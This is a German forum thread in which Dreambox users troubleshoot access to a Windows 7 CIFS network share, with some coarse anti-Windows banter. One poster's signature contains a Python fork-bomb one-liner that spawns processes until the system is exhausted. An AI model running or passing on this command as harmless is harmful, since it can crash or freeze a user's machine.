Cifs unter Windows 7

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • Cifs unter Windows 7

      Ich bekomme es nicht hin den Netzwerkbrowser einzustellen.
      Wenn ich auf die Ip meines Rechner Klicke gehe ich auf Freigaben Verwaltung, dann steht dort Netzwerkfreigabe hinzufügen. Wie muss ich die Werte einstellenn um das 2.Bild zu erhalten wie es oben abgebildet ist.


      Aktiv------ein
      Lokaler Freigabename----sharename
      Freigabetyp--------NFS Freigabe
      Server IP-----192.168.0.0
      Server Freigabe-----/export/hdd
      users HDD replacement--------nein
      Freigabe Optionen ------------rw,nolock

      Mein Betriebssystem ist Windows 7, mein Rechner hat die Ip 192.168.19.20, meine Dreambox 8000 hat die Ip 192.168.19.60, die Filme habe ich auf mein PC im Verzeichniss F:Filme, ich habe eine Netzwerkfreigabe auf \\Mein-PC\Filme

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von elochso ()

    • Ich hatte mich damals vertan, ich meinte eine Cifs freigabe, also ich kann unter Netzwerkbrowser nun mein PC sehen, aber den Ordner den ich freigegeben habe unter Windows 7 kann ich nicht sehen, mit anderen PC´s im Netzwerk kann ich aber auf diesen Ordner zugreifen. Ich habe den Ordner für JEDER freigegeben, kann mir mal da jemand helfen komme nicht weiter
      Dateien
      • dump.bmp

        (1,24 MB, 1.361 mal heruntergeladen, zuletzt: )

      Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von elochso ()

    • Original von elochso
      Ich hatte mich damals vertan, ich meinte eine Cifs freigabe, also ich kann unter Netzwerkbrowser nun mein PC sehen, aber den Ordner den ich freigegeben habe unter Windows 7 kann ich nicht sehen


      ganz einfach microschrott ist der meinung in vista und windooof7 das protokoll zuändern der netzwerkbrowser funktioniert nur bis windooof xp
      und nein ich werde mir keine linzenz von vista bzw. windoof7 holen um das zufixen
      » time to say goodbye «

      Konfuzius sagt:
      Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
    • erklär mal was du damit meinst?? Es gibt Menschen die können mit Windows eben besser wie mit Linux, deshalb ist das was man nicht kann noch lange nicht schrott??

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von elochso ()

    • Original von elochso
      erklär mal was du damit meinst?? Es gibt Menschen die können mit Windows eben besser wie mit Linux, deshalb ist das was man nicht kann noch lange nicht schrott??


      Eben und wir können nur Linux da geht das einwandfrei ich würde mal den M$ support fragen ob die ihren scheiss fixen wollen. :P :P
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • habe es rausbekommen, ist ja bei Windows sehr einfach gehalten, man gibt unter Windows7 einfach einen Ordner frei für Jeder, und diesen Ordner trägt man dann unter Server Freigabe ein. Also wenn ich den Order Filme freigegeben habe trage ich auch nur Filme ein und nicht wie es hier steht /media/net/Filme einfach nur Filme das reicht.
      Danke für eure Hilfe
    • Original von elochso
      habe es rausbekommen, ist ja bei Windows sehr einfach gehalten, man gibt unter Windows7 einfach einen Ordner frei für Jeder, und diesen Ordner trägt man dann unter Server Freigabe ein. Also wenn ich den Order Filme freigegeben habe trage ich auch nur Filme ein und nicht wie es hier steht /media/net/Filme einfach nur Filme das reicht.
      Danke für eure Hilfe


      na ja, das ist doch schon immer so gewesen, dein freigegebener Ordner wird dann automatisch nach media/net gelinkt.
    • Original von Lusche

      na ja, das ist doch schon immer so gewesen, dein freigegebener Ordner wird dann automatisch nach media/net gelinkt.


      Richtig. :) und das hat auch recht wenig mit dem Problem zu tun, was nixkoenner und Kati910 da eigentlich angesprochen haben. ;)
      "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)
    • wichtig bei win7 freigaben ist, man muß einen weiteren benutzer anlegen, da es probleme mit dem ersten (standart) admin-benutzerkonto gibt. dann klappts auch wunderbar mit windows7 und deren freigaben.

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von sakartvelo ()

    • Ich muss das Thema nochmal aufleben lassen...

      Bei klappt es leider immer noch nicht. Habe auf meinem Windows 7 Rechner einen Ordner als "Filme" freigegeben. Zugriff für Benutzer "Dream" und Kennwort "dream" und auch für den Benutzer "Jeder".

      In meiner Dream 8000 kann ich im Netzwerkbrowser meinen PC sehen, aber nicht den freigegebenen Ordner. Dann manuell gemountet und vorher unter media/net/Filme angelegt.

      Aber es gibt keine Verbindung... Hat jemand noch eine Idee?
      Bilder
      • netzwerk.jpg

        94,2 kB, 720×405, 8.170 mal angesehen